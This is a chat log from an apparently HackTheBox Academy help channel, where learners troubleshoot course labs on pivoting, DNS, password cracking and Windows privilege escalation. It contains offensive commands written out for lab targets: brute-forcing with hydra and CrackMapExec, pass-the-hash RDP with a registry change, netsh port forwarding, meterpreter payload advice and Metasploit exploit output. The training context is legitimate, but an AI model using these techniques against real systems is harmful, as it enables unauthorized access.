#modules
I did some research, but was probably looking for the wrong thing. I didn't check how the resolver should be configured on github
It checks DNS (public, /etc/hosts); if it knows what you're asking it, fine, but if it doesn't it'll just tell you "no"
It's basically a list of "hey check the dns for these specific resolvers"
I'm on the Attacking Common Services - Easy module and am having trouble getting the flag. Is the goal to use the LOAD_FILE command to view the flag or to upload a shell through MySQL to make a reverse shell?
Ok. That's interesting because my /etc/hosts always had the ip and domain in it. From the looks of it and your help, it was the resolvers.txt file. So far no errors showing up
Whatever works to read the file. I believe this is one that has 2 solutions
Yes. But it didn't have the NS. So if you specified ns.inlanefreight.htb in the resolvers file it has zero frame of reference, since it's not on a public server
Ohhh, ok. I gotcha now. Thanks a bunch. I appreciate this. Understanding how it works keeps it in memory
yep, using the IP tells it to directly query the IP instead of trying to look through other files for references
Hey guys, just a quick question. I don't have a subscription on Academy anymore; if I bought some cubes and unlocked a module, would I still get access to the VMs and all? In other words, I'm only interested in a couple of modules, so paying for the subscription doesn't seem worth it
I mean the subscription is still far cheaper than buying the cubes outright
- the cubes from the subscription are yours forever
- the modules unlocked via cubes are yours forever
the in-browser VM is accessible regardless of a subscription; if you spent any money or previously had a subscription then you're not limited to the 1/day spawn of it. But it's in general better to set up your own VM
are modules time-limited if unlocked with cubes? Say a module I'm interested in costs 500 cubes ($50); I can't see how a subscription would be better
no
look up the pricing and how much you get for a platinum sub vs the price of 1000 cubes
even gold monthly (500 cubes) is $38 while 500 cubes outright is $50
oh i see what you mean
ye
so I could just do 1 month of sub to get the 500 cubes
and once unlocked it stays yeah? Once the sub is cancelled I still get access to the module yes?
yes
you can unlock a module with cubes, not touch it for months/years and it still be sitting there
awesome, thanks so much for confirming!
what tier 3 modules are you looking to get?
the NTLM relay one
good choice
That seems weird to have this many different subscriptions and cubes sold directly for more though
it is, we just ignore the direct purchase lol
I'm using SELECT LOAD_FILE('C:\Users\admin\Desktop\flag.txt'); and am getting a NULL result. Is the path wrong or am I trying the wrong thing?
administrator
:)
windows uses the full word
only time i'd advocate for direct purchase is for the smaller amounts if you just need that tiny bit more
but aside from that monthly subs far outweigh the other options
(and the $8/m student sub is one of the best values if you have a student email)
honestly even then it's not worth it, if you upgrade your monthly sub you get the difference in cubes right away
if you're already on plat then it's gg
that's the only situation 
Thanks. I used that and added \ instead of .
but i'm just purely speaking hypothetically
wish I was! Thanks again for the tips
Almost done with the silver annual, 5 modules left to finish. Are there any two tier 3 or one tier 4 that anyone thinks is a must do?
actually one last question, can you cancel the subscription as soon as you got the cubes? (before unlocking any module)
Yes
stuck on password attacks - protected archives. I was able to crack the notes.zip but the question at the bottom doesn't accept the contents as the answer
unless what I cracked is a password to open the zip file
yeah that was it..
for AD, kerberos and ADCS
Can someone tell me if it's possible to set up your very own VPN or proxy on Linux distros?
yes
hello, I had a problem here. Basically I had to start the Kali box with this command: ssh kali@10.129.204.151, but I always got this answer: ssh: connect to host 10.129.204.151 port 22: Connection refused
how can I fix it?
is 22 open on that device?
I didn't know how to see it, I am a very beginner too. These are the steps they said I have to follow
but, basically i just get refused
u sure the password is kali?
scan the host with nmap
also sometimes you gotta wait a few minutes after starting the target
yea, I had no problem starting, for example, the Windows machine with the RDP command; only for Kali I had an issue
I didn't know, I just normally follow the steps they gave us to do, and normally there's no problem, but this time I had a problem, it always refuses me
this is the question I have to answer, but without following the steps I can't answer it
I have to access Kali to be able to use John the Ripper to break the cryptographic hash to get my password
read just above the question: it's asking you to rdp
also evidenced by the 3389 being open: you're being tasked to initially rdp as bob
yes i am here, i already did the RDP
but I can't start the Kali box that has the tool I need to find my answer
I close everything, I start again, still I get this answer
the question tells you that you need to use RDP
if the port for SSH is not open (nor running) you cannot SSH into the target
why do you need to SSH for this question? Isn't the question just asking you to kerberoast from that Windows host?
can I DM you? sorry for asking at this time
sure I can't promise I'll be able to solve your issue, I don't pretend to be an expert but I'll give it a shot
really thanks
Hello,
The connection is really unstable at my location, and RDP does not work well.
I am thinking of running my C2 or just using Metasploit to connect over PowerShell. Is that allowed? Or is there some Defender enabled that will block my connection?
Did anyone try it before?
thanx
bash-3.2$ xfreerdp /v:10.129.110.241 /u:htb-student /p:HTB_@cademy_stdnt\!
[17:01:15:392] [1881:6d4c7000] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
bash-3.2$ xfreerdp /v:10.129.110.241 /u:htb-student /p:HTB_@cademy_stdnt\!
[17:01:17:304] [1885:6d94b000] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
bash-3.2$ xfreerdp /v:10.129.110.241 /u:htb-student /p:HTB_@cademy_stdnt\!
[17:01:19:047] [1888:6cecb000] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
bash-3.2$ xfreerdp /v:10.129.110.241 /u:htb-student /p:HTB_@cademy_stdnt\!
[17:01:21:635] [1891:6f373000] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
bash-3.2$ nmap -p3389 10.129.110.241
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-19 17:01 WIB
Nmap scan report for 10.129.110.241
Host is up (0.22s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 11.52 seconds
I believe this error is expected right? Because the target server is very old (Server 2008). Is there any way to connect to this server using xfreerdp? (Im currently learning Windows PrivEsc module https://academy.hackthebox.com/module/67/section/912)
I'm having an issue with the last question of the Windows CMD line module. Question:
What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
Output:
Message
-------
An account failed to log on....
An account failed to log on....
An account failed to log on....
An account failed to log on....
An account failed to log on....
An account failed to log on....
How do I expand the message?
nvm solved
Hello guys... Do you experience disconnection issues?
Yes
I see
Hello
Just out of curiosity, in the Linux OS fundamentals, when I did "locate **.log | wc -l" I got 24 as the result, but when I used "find / -name *.log 2>/dev/null | wc -l" I got 32. What caused this discrepancy?
find searches the file system in real-time
locate uses a pre-built index of file paths on the system, typically updated by the updatedb command.
Hi guys I'm on the [Code Analysis] part of INTRODUCTION TO MALWARE ANALYSIS
I've got the second question right, but not the first one. Where could I start? Looking through every function?
"IDA to analyze orange.exe. Enter the registry key that it modifies for persistence as your answer. Answer format: SOFTWARE____"
Hi, I am in "introduction to network analysis" and there are so many errors in the answers... According to their solutions document, the good answer is 43 804 and 80, but for this question, "What are the client and server port numbers used in first full TCP three-way handshake? (low number first then high number)", my answer is "80 43804" and it is not accepted. Please, can you help me?
Is there any support to report these inconsistencies ?
where do you see a solution document?
Just completed the AD attacks and enumeration module, finally! Hardest module I've done so far
nice, thats a big hurdle
Nice, I think Malware Analysis is harder tbh, it is breaking my head
Search through the different subroutines
If you could not find it in the strings, maybe it is generated elsewhere
Need a little help in file transfer
want to transfer a file from the RDP session to Pwnbox but scp always says timed out
Getting really really frustrated
Are you sure there's ssh here?
i think so
For this simple thing I've been stuck here for long, can't even complete the section
have anyone done Introduction to C#
Declare a byte variable aByte and assign it the maximum value that a byte can hold. (from Understanding Variables, Constants, and Data Types in C#)
Interesting, I was thinking dacl attacks, and advanced sql injection
I do not know why that 255 is incorrect...
did you solve it?
No, I didn't find any help so I went on to another module. I understand what the lesson is about but not what I have to do for the questions; maybe it's just my bad English.
nvm I will try to ask bard or chatgpt for that
Tried the same. Nothing was the correct answer
Hello guys, I'm solving the module about windows event logs, have anyone got any idea about the first question?
PayloadBunny solved it... still waiting for his answer lol
Let me know in my DM, thanks!
Is it "byte.MaxValue"?
Is that the full question even? Sounds like something is missing
yes that is the full question. And I have no idea with that even I have read the module
Oh I guess the answer is the line of code?
Hey, is HTB having server issues? I'm trying to complete boxes on the CPTS Job role path and the lag is horrible. I'm in UK and tried every VPN server with the same lag issues
byte aByte = byte.MaxValue;
you are right
that is the answer
Thanks! Still wondering why the question is asked like this.
Hello can I DM anyone about Skills Assessment - File Inclusion
Hey guys, I'm struggling a bit about the xss Phishing section
any1 else get a really slow VPN connection? (Have tried changing VPN+protocol and resetting the target.)
It looks normal for me perper
Ok thanks. Must be something with my VM...
It is slow and dropping for me
Ok, good to know. Thought it was my (Kali) VM
hey guys
need help, I wanted to try the HTB CTFs. I see an event running but it's asking for an invite code!!
Wrong channel
For a part of a module you can download a zip folder which contains a file called solution.md, and one question is exactly the same,
and even their answer doesn't work...
Have you tried to replicate the steps? I remember solving this task without any problems
ahh, my bad. Can you help me navigate to the right one?
Well if you're specifically talking about the apocalypse ctf #1204440084867325982
Otherwise: if it requires a key, its private
To connect to the internal network on the machine, I type the following command: (just like what was in this ligolo instruction link):
https://4pfsec.com/ligolo#heading-adding-a-new-route-on-proxy-server
listener_add --addr 0.0.0.0:11601 --to 172.16.6.100:11601 --tcp
listener_list
I then typed './agent.exe -connect 172.16.6.100:11601 -ignore-cert'
But it doesn't give me the option to choose that internal address.
Why is that?
https://academy.hackthebox.com/module/143/section/1278
ahh i seee
https://ctf.hackthebox.com/event/details/hack-the-box-exhibition-ctf-56
i was talking about this one
It's private
Meaning invite only
That part is for double pivot, are you already double pivoting or are you just breaking into the internal network?
yep thankyou for helping me with my questions
I thought what I was doing was double pivoting and I thought double pivoting was my way of breaking into the internal network
@fathom pendant Good morning, Checking in on the Attack DNS Seems like one sub domain popped up on the "subbrute" command. Been about an hour. That one doesn't work for the axfr. Is this supposed to take hours?
Your listener_add is incorrect
A normal pivot allows you to access the first network (that you usually canβt access). Now if this first network has a computer in it that has a second network linked to it, then you would double pivot
Yes, I did it. Look, the question is "What are the client and server port numbers used in first full TCP three-way handshake? (low number first then high number)" and the solution from the md file they give is: What are the client and server port numbers used in first full TCP three-way handshake? client: 43804 server: 80. I checked by myself and I found 80 and 43803 too
So my answer is 80 43804
but it is wrong and i don't know why
It starts with h
Also make sure your target didn't die
The first full tcp handshake is the one that has syn, syn ack and ack events, does 43804 have all three events?
Yes. I got the h one already but the axfr doesn't seem to work Syntax:
dig axfr @h.... inlanefreight.htb
because that's the incorrect syntax
the @ is calling the nameserver in dig
if your system doesn't know what h*.inlanefreight.htb is, it doesn't resolve it
it would be dig axfr h* @ip
Wow, thanks. That did it. I'm going to go back and review the dns portion again. Something simple took too long
that's not so much dns, as it is you not using a tool properly
think of dig this way: you are digging for records OF a domain @ the nameserver
Can someone help break down the command "curl https://www.inlanefreight.com | tr " " "\n" | cut -d"'" -f2 | cut -d'"' -f2 | grep www.inlanefreight.com | sort -u | wc -l" and help me understand how exactly this counts unique paths? I don't fully understand the delimiters in particular.
look up what each command does
I know what they all do individually
But not how this combination achieves the desired outcome
I'm no command line wizard, but I would ask chatgpt and it can give you a step by step breakdown
it takes the curl result: cuts out everything that isn't in the specified area that's being filtered for then looks for a specific string, it then sorts by unique and counts them
That's a good call. I forgot about chat gpt
do it one part at a time if you're really having issues
You were completely right, I hadn't noticed that port 43804 had rejected and that it was port 43806 which accepted first but suddenly, hack the box deliberately put a bad answer in their document?
or it was to get you to look for specific things
¯\_(ツ)_/¯
Gotcha. Thanks a lot. Makes better sense now
I changed the listener command to "listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
listener_list
" but it's still not showing three options:
(the option that includes 172.16.6.100).
select the #1 session, check the ifconfig of that session
does that include the related subnet you're trying to access
not here read #rules
2FA doesn't mean anything if they have your token
best option: reset all passwords, 2FA, everything
What rule?
we don't help with account recovery or anything of that nature
this channel is also for help with htb academy modules
not for rando "I got hacked" stuff
reading a server's #welcome channel is a good way to see what it's about
Yes ma'am.
if you can't ping 172.16.x.x , you should create new interface then route it to the subnet
then start the session from ligolo
Yep. I typed it. Though I typed 'sudo ip route add 172.16.6.100/32 dev ligolo' and not 'sudo ip route add 172.16.6.100/16 dev ligolo' because I kept getting a 'device length' error.
that's not how it works
why you add .100/32 ?
^
the .100/32 is an incredibly limited network (in fact one could say that it is fully limited)
I mean he already can reach this host , so it's useless
Honestly, because that's the only network subnet that would work for me... not because I entirely understood what I was doing
that's not a subnet anyway
try this ?
/32 means the subnet mask is filled
you can do 172.16.6.0/16
that would technically be the right thing
i don't believe it will work
it will
@cedar void you should read this https://academy.hackthebox.com/module/details/34
try /24
24 yeah it will work
or i did it right when i was doing it and didn't realize lol
but that may have been subconsciously knowing how CIDR addressing works
So I typed ip route and I got only two results back, I think, for the 172.x.x.x subnet. I got three results back when I use the subnet /24
you still can't ping the 172.16.x.x network ?
hey, quick question: are the labs and VPN connection on the academy soooo slow for everyone, or just me?
like REALLY SLOW
Yes, it's really slow. Only one line has shown in the screenshot and it's been several minutes
that's "no connection at all", not slow
go to ligolo and start the session
my problem is that even when I ssh into a box, it is sooo laggy and slow when using the terminal
can anyone confirm that? I wanna know if it's my problem and if I should do smth or what
I am on eu-academy-2 , and there's no lag
i tried the two eu servers
apparently my side it is
It shows start is already in session
btw the new ligolo-ng syntax is different compared to the old version; I forgot what it is but you need to add a tun something command
I got the exact same issue. Tried all servers but nothing works
are you talking about when you do the sudo ip route command?
name of the movie lol
Hackers is so great. The Net with Sandra Bullock is underrated too
what you see has nothing to do with hacking
I did nmap nmap 176.16.6.100 and nmap 176.16.0.0 and could not get any connection
If you can't reach them , how tf you will scan them
you did something wrong just try again
I didn't check 176.16.0.0 and had restarted the session by that point, and tried with an nmap... geezus
it works ?
IT still do not work so I will just try again
Hello, on the Broken Auth Skills Assessment I am having issues privilege escalating. I keep getting "User cannot have requested role". I've been trying to drop the cookie after authentication and then refreshing. Have also tried setting the cookie before I authenticate.
Im attempting to password spray the admin users I found
Hey @molten prawn do u want to see what I tried
sure
show me what you tried and imma tell you if you are on the right path
@shut wraith
Alright once my internet is back up I will show u
I think I found a broken module in Web Attacks > IDOR in Insecure APIs. The server has an index.php page that is using jQuery, but doesn't have jQuery loaded. I have tried resetting to a new server but the same issue occurs. The issue occurs when trying to click the 'Update profile' button; it's supposed to call the updateProfile function in script.js but script.js is full of 'ReferenceError' errors since it doesn't know what the $ symbol is without jQuery.
I finished this module last week, without any trouble.
not sure why i cant click the button
did you manage to solve it somehow?
How do I avoid "too many requests" while using gobuster?
ayoooo whats happening
I don't really understand what I'm supposed to do in the WEB SERVICE & API ATTACKS module. What is that VPN connection file shit?
had the same issue a while ago, restarting the target machine did it for me
try restarting the the target
could you address the issue ?
whats the problem ?
bros getting hit by dat magnetic storm ig
its fine
My RDP keeps dropping
what could possibly cause this
wait, huh, you too have the same profile
wdym?
you and lolz
lmao
literally the same profile
bro got bamboozled
frrrr
thats my alt fam
omg
can you guess what 3301 represents....?
lemme think a bit
here's a joker: it's puzzles, advanced cryptography and insane logic in order to solve 'em
cicada
yep
lets solve it
sure
do you see the bigger heading letters too?
yeah
thats nice
typical, that's MD (markdown)
different symbols represent different ways to showcase the text
ik, but most servers don't allow the use of big headings
ohhh, weird
Hi guys, I'm doing a SOC analysis of a phishing email and I need help with something; if I can send a message with more details, let me know.
For those who have finished "Introduction to Digital Forensics" , what's the proper way of using Velociraptor to get the IP of the C2? I ended up getting it using other tool because I couldn't figure how to do it with velociraptor
stuck on password attacks lab - medium. Found a docx file that's protected, ran office2john on it and grabbed the password to the file. However, is there a way to open the file w the pw? nano, cat and vi don't prompt me to enter the pw. Is there a missing flag for either of those commands?
I believe what I did was I just opened it up in Google docs so I can enter the password, not sure if there was a way to do it from the command line but Google docs worked for me
just tried that myself, however it stays stuck on loading.. some research says Google Docs doesn't support password protected documents
you could try opening it in libreoffice
Huh weird I had no issue with using Google docs
I don't think LibreOffice is loaded onto the Pwnbox
Yeah LibreOffice or O365 should have no issues opening it either
Yeah I just checked I even still have that document on my Google drive so I definitely used Google docs for it
weird okay let me try that again
So just to confirm you got the hash from office2john and then cracked it? If you have the clear text password I can't imagine why any word processor application wouldn't open the document
yeah exactly
still trying to open it on Google Docs, the file just gets stuck on the upload at 9kb
Yeah then just try different applications that can open that format eventually you'll get it to open
Hey guys, how can I move to a folder after performing an ExtraSids attack? I need the flag located under "c:\ExtraSids". Using the following command "ls \\academy-ea-dc01.inlanefreight.local\c$" returns the content of the C drive, but when I attempt something like "ls \\academy-ea-dc01.inlanefreight.local\c:\ExtraSids$" it returns an error saying it doesn't exist. SOLVED
hi! How do I connect a compromised Windows host to a windows/meterpreter/reverse_tcp payload session?
Have you set the LHOST? I think that's what I always forget to do.
ditched Pwnbox and loaded up my personal VM with LibreOffice.. got into the docx file, thanks
Does subbrute always look like it's hanging? Or is it actually hanging? It didn't do anything after I hit enter. The strong silent type perhaps?
You mean you compromised it manually and now want to connect to meterpreter afterwards?
what module is that?
thanks yeah had to restart the vm not the server
ur welcome
it's Windows privilege escalation
assessment 1. I was able to get a foothold with a reverse shell
now I want to escalate it to a meterpreter session with msfconsole
is there any suggestion how to do it?
exactly
i did
It shouldn't hang. Sometimes it takes a minute to go through
use msfvenom to create a meterpreter binary that calls to your listener and transfer that over to the compromised machine
Is this the only way?
I think metasploit has the upgrade option, but it doesn't always work
do you already have a shell in msf?
No i have it with nc
then yeah to get a meterpreter shell you need to use the msf handler
Thank you for your help, I'm gonna try it
Thanks! I'll look into it
can anyone tell me why I get this error when trying to run ssh2john?
python3 /usr/share/john/ssh2john.py id_rsa > rsa.hash
Traceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'
try with python2/2.7
that worked, had to install python2 on my vm
Hmm.. How can I avoid "out of 12 dropped probes since last increase."? while using nmap. Scanning a text file with IPs~
would -Pn help there?
Any hints would be great
What module is this for?
On Windows Priv Esc > Windows Server - trying to get the reverse shell running Metasploit.
But get the the following error on target
any ideas?
hello, I'm stuck on the password attacks module in the Network Services section
not stuck, but I found the RDP username and password
but I get an error back when I try to xfreerdp
Are you sure that's the right user/password?
Each answer in this section is unique
yes, I basically did all the other questions
but lemme double check
@fathom pendant None tbh.. Just went with gobuster: gobuster dns -d "" -w ~/wordlists/subdomains.txt -i on a friend's homepage ;p then tried proxychains nmap etc :3.. Forgot I might not ask here ^_^ I apologize.
This channel is for assistance with academy modules not personal stuff
strange, I tried the same combination and I got the RDP session but I get this error
I've never seen that tbh
@fathom pendant Ayeh, I forgot! That's why I said sorry mate
that's a linux host isn't it, I don't think you're supposed to use rdp
anyone can help me with skills assessments 2 - attacking common applications
how should i log in with rdp credentials then?
Technically a linux host can use rdp, see also: shells and payloads: live engagement
yeah ik, there are some modules where you're not supposed to rdp into the linux jump host
right they did ask you to login, the error looks like wrong creds
Domain expansion: proper use of power
Ryoiki Tenkai!
skill issue indeed
figured so from the moment I saw an error screen no one has ever seen
I didn't get to ping >:[ shakes fist at cloud
what happened ?
Someone being a dumbass
not unusual 
I tried doing this exercise on my VirtualBox and when I ping the 172.16.x.x internal address there is still no connection.
sudo ip route add 172.16.0.0/16 dev ligolo
ip route
well, I'm doing the web services and API module and I've got no clue what the VPN connection file is or how to use it
you shouldn't be doing that module
are there other modules that explain that before?
i suggest you do the infosec foundations path before moving on
because there is no particular order from what i see
alright thanks
I suggest looking at the "setting up" module
If you want a structured path, there's the skill paths and job role paths
good to know, I was trying to find an order for the CBBH path
thanks
Click cbbh job role path > enroll
It will give you a list of modules in order
yeah i saw that thanks
You just need to send me feet pics, afterwards you should see the path on the academy
Why are you gross
wdym
Asking for feet pics
It isn't, and you're just being weird
where's the ban
lmao
Pspsps @solid python
why would CME work against SMB on a target while failing with hydra?
Because hydra silly sometimes
they likely do something slightly different behind the scenes ¯\_(ツ)_/¯
what's with the spam today lol
The fact is that I find CME very slow; isn't there any param to speed it up?
the target is probably domain joined? hydra defaults to local auth
chill bro
you were answering me?
most likely inlanefreight domain .. is there a way to change smb usage?
I was talking about the dumbass being racist
that was.. unexpected lol
I think hydra has a domain flag
big yikes
smb2://<target>/workgroup:{<domain>}
there is, but I don't think it's documented anywhere; need to read the source code to find out https://github.com/vanhauser-thc/thc-hydra/blob/8c4165a83bc3126dd727244e0b5466c1a18aa67c/hydra-smb2.c#L229
I dont think smb2 was fully implemented yet
For hydra*
it still works I think
I thought I'd copy the results so far from subbrute before the Pwnbox or target inevitably dropped. Pressed CTRL + C by accident and closed it. Light a candle for me
I waited so long
why not use something much faster like ffuf or gobuster
Subbrute is the tool recommended by the section
ah, unlucky
Indeed
it should only take a few minutes ¯\_(ツ)_/¯
should I really wait for eternity to get the ssh password in the Password Mutations section of the Password Attacks module
Don't attack ssh
I'm attacking ftp rn
but it's still taking a long time lol
Increasing threads can help too
i will try that rn
nvm i just got the password
Just start complaining and it works
anywho, what's the best -t argument to use with CME
it already defaults to 100, it's not really gonna make much of a difference even if you set it higher
netexec simply isn't designed to be a bruteforce tool
damn, I was hoping there was a way to speed this up lol
If it's taking too long: it's likely the wrong list
Most stuff should happen within 10-20 minutes
less JJK more pentesting
it shouldn't be the wrong list, it's a mutated pw list from the resources
password attacks module
Size of list?
how do i get that?
we are all doing password cracking wtf
wc -l
I'm not
94044
Also bruteforcing is not password cracking
it's by far the most time consuming one lol
I think PE/AD will be the longest ones
yeah, looks that way @fathom pendant. I'm curious how often I'll have to bruteforce on the actual exam
Personally with cme I'll pipe to grep and do grep -v [-]
It's in the course, so it's on the exam
I just hope I don't spend days on that lmao, knowing me, it's how I'll fail, using the wrong damn list
I'm having the same problem rn, did you change anything or did you just wait
patience
As I said, I end up using an inverse grep to only show me the positive output instead of all the fails (after first verifying my method is right)
-.-
I'll definitely give that a go, thanks! always helpful
Don't be gross
so how does everyone like to pass time while you wait for a successful bruteforce attempt?
Just button mashed my way to the attacking DNS flag 
HELP!
I am stuck in the Intrusion Detection With Splunk (Real-world Scenario) section. This question has been bugging me for days:
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: _.exe
I tried to filter for EventCode 4688 and clr.dll but got no results. I tried to filter with Update.exe but it was of no use. I am literally stuck here and would like to know what are the steps to be taken in order to find the process.
yes, I changed ssh to ftp, still took a long time
you can get more hints to speed up the process by checking the HTB forums, it actually helps
lmaoo
trying the marcielee suggestion with CME '| grep -v [-]', worked pretty nicely, just not used to not having all the feedback constantly
I don't see the problem bc the program by default stops itself after finding the valid creds
I honestly do that so that if i'm trying multiple users I don't miss it/have to scroll up a ton to find it
this last lab is killing me.. pw attacks lab - hard.. I found a .kdbx file that I'm trying to download to my attack host using evil-winrm. Evil-WinRM PS C:\Users\johanna\Documents> download <file>.kdbx /home/<file>.kdbx
download failed
I don't remember off the top of my head but I feel like download should be at the hitting of the command maybe
what do you mean?
Oh nvm I misread the command my bad. In any case, try to specify the absolute path of the file you want to download and the absolute path of the destination, it's probably just a syntax issue
For example,
download C:\Users\johanna\Documents\file_name.kdbx /home/file_name.kdbx
dude... ugh .. i was missing an 's' in the file name
happens to me all the time
maybe its time for a break
so i have this question , why not just extract the sam & lsa secrets remotely with crackmapexec instead of copying the 5 hives to our attack machine..
remotely seems a lot faster and easier?
i think htb just shows you different methods
hmm
i see, but i believe there must be some advantage in that method over the remote one idk
or maybe just an alternative
Just different ways of doing a similar thing
hello there, to Moderator, the lab Windows Server from WPE is not working, looks is something related with the certificate
i see, thank you :3
Contact support regarding this.
ok., I will
i need extra practice with Bash Scripting does anyone have any references ?
Stuck on WINDOWS PRIVILEGE ESCALATION:Pillaging
Question: Log in as Grace and find the cookies for the slacktestapp.com website. Use the cookie to log in into slacktestapp.com from a browser within the RDP session and submit the flag.
Need to transfer the file from rdp to pwnbox but ohh... this is just not happening..
Can anyone help..?
why do you need to transfer it from rdp to pwnbox?
the question tells you to use a browser in the rdp session
(also xfreerdp has the /drive: option)
Trying to answer the following but having no luck, anyone able to provide some insight?
there's more info that rpc may not give you
they're part of multiple groups
so im better off looking outside of rpcclient?
didnt think i'd be able to due to it being one of the weird SSH into a parrotsec box or w/e it is
What module is it?
Kerberoasting - from Linux in the AD enumeration and attacks
I don't quite recall but there's stuff on that section that should tell you how to get more info
rpc is very basic
ight i'll keep looking thanks, having to use these shells vs normal machine is frustrating lol
Actually I need to extract cookie from the file and for that i need to do this from the picture
Then I need to use this [2]
That's why thinking of that
Anyways trying the way you mentioned
hey folks running through the attacking enterprise network module and am hitting [-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
anyone have an idea on how to get past this i tried rdate but theres no time port on the dc cant proceed here
try ntpdate, make sure you're targeting the right ip
proxychains sudo ntpdate -u 172.16.8.0 && date
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
ntpdig: no eligible servers
tried with the target ip and all ips that are up and get this error
not able to grab the hash i need for questions complete sol
anyone have any tips to transfer from a internal network out to the attacker machine?
i guess the principle is the same its just i dont remember what powershell command to use
get a meterpreter shell or use nc im not there yet with pivoting and tunneling
you can set up a http upload server, pivot and upload, easy
are you targeting dc
yes
i have a http server running on the attacker machine
but i cant remember how to send files from windows machine with basic shell to that http server
the server supports upload yeah? you need the psupload script if you want to do it through powershell
what way would you do it?
i dont know if not being on the same network is preventing it from working or if theres no port open for time
no, I sync clocks through pivot all the time, never been an issue
wdym?
i disabled auto sync for vm ran the said command with the dcs ip and its still erroring out
date: Not enough valid responses received in time
rdate: Unable to get a reasonable time estimate
172.16.8.0 is not dc's ip
i dont know the time to fake
use nmap --script smb2-time
i got a password last changed 2022-06-01 14:32:18.194423 but i dont know dcs current time or date only have 16 mins left on box maybe itll work tomorrow or support will have something different to say other than change location on vpn
tried fake time with output of nmap script and changing my time zone to england neither worked tried disabling the autosync of vm but it didnt work ill have to redo the module for the 6th time good practice i guess
hydra -l marlin@inlanefreight.htb -p pws.list -f 10.129.203.12 pop3 why doesnt this work attacking common services mail
@next bronze im trying something like copy SAM //172.16.x.x:30007/share with ligolo-ng
smb always use port 445 on windows, and ligolo can't reverse forward smb traffic
Man the Web Proxies module feels like such a come down after the AD module, I've been on this same section for 2 days now just because I can't get in the groove for this
hey guys, I got stuck in the Active Directory Skill assessment 1. I'm trying to solve question 4 where I need to connect to MS01 and obtain a flag from it. but I don't seem to get into the system. I tried to use Enter-PSSession using the credentials found for the previous question, I get the shell but I'm not able to run any commands on them, only a few commands like systeminfo, whoami works. Even cd and ls doesn't work. I don't understand what the problem is. I thought of using evilwinrm using chisel but communication through chisel is not happening at all. The question is "Submit the contents of the flag.txt file on the Administrator desktop on MS01". It would be great if someone can give me a nudge on this one. Thanks
Why wont my target spawn in htb
I had a lot of frustration trying to use chisel or any other pivot/tunneling, so I instead used netsh.exe to forward the traffic to MS01 that made life a lot easier
oh thanks. I'll give it a try
||netsh interface portproxy add v4tov4 listenport=1515 listenaddress=<WEB-WIN01> connectport=3389 connectaddress=IP_of_MS01||
why doesnt my target spawn i switched vpn but it no work why
how do i connect to port with imap/pop3 and login?
┌─[✗]─[sam@parrot]─[~]
└──╼ $openssl s_client -connect 10.129.21.20:993 -debug -starttls imap
is just empty no prompt
This isn't the correct subnet for the IP address in interface 0?
I followed the video in the ligolo-ng github link (https://github.com/nicocha30/ligolo-ng)
|| 172.16.6.100/16
sudo ip route add 172.16.0.0/16 dev ligolo||
Check the subnet you added to the IP route List.
172.16.0.0/16 is huge, that's 172.16.0.0 - 172.16.255.255
usually for academy /24 is enough
Just going through an optional exercise
(In windows environment)
I have access to jeff user which have permissions to open cmd and powershell as Administrator
I have the hash of the Administrator.
Question: Get into Administrator RDP session
Condition: Cracking Administrator hash FAILED from all aspects
What fails:-
Trying : reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f FAILED
Trying: xfreerdp /v:IP /u:Administrator /pth: HASH_OF_ADMINISTRATOR cert:ignore FAILED
Just want to know the approach of you guyz..!!!! how you are gonna deal with this
I have very limited idea regarding this so want to broaden up..!!!!
wdym by DisableRestrictedAdmin failed
just putting failed doesn't really help if you don't include the error
Any idea why I cant connect to RDP using TCP vpn , but connect through UPD but its laggy
It gives Access: Denied
Even after opening cmd as Administrator in context of jeff
that shouldn't be possible, if you have admin rights, you can edit the registry
Hi everyone, I need help with the academy's Windows privilege escalation part.
The question asked is: "What service is listening on 0.0.0.0:21? (two words)"
I used `netstat -ano` to find the service running on port 21, and noted its PID, then used
```bash
tasklist /fi "PID eq <pid-no>"
```
to know which service was running on that port. The output I got is:
```bash
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
FileZilla Server.exe          2096 Services                   0     11,004 K
```
but this answer is incorrect?? Can anyone help with this?
Hallos
Read the question again and you'll see you have the answer
On Windows Priv Esc > Windows Server - When trying to set up the meterpreter session I get the following error on target when running the dll
Could it we the port in metasploit? Couldn't use the default one (445) since it gives Permission denied
Thanks got it, a silly mistake.
been there
Hi! i am a bit stuck with windows privilege escalation assessment 1. The target appears to be vulnerable but session is not created with the exploit. Can someone please help?
[msf](Jobs:1 Agents:1) post(multi/recon/local_exploit_suggester) >> exploit
[*] 10.129.225.46 - Collecting local exploits for x64/windows...
[*] 10.129.225.46 - 181 exploit checks are being tried...
[+] 10.129.225.46 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.129.225.46 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.129.225.46 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
